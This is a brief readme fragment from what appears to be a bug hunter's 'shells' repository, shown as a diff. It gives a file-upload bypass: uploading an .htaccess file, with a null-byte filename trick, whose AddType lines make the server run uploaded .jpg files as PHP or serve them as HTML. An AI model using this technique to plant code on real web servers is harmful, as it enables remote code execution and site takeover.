tonythebughunter/shells/readme.md

 ## Via .htaccess:
-filename=".htaccess"
+filename=".htaccess"    Bypass    ".htaccess%00.jpg"

   AddType application/x-httpd-php .jpg         ---->This will process any jpg file uploaded as php: Also make sure to set Content-Type: application/x-php when uploding the   jpg

   AddType text/html .jpg                       ---->This will process any jpg file uploaded as html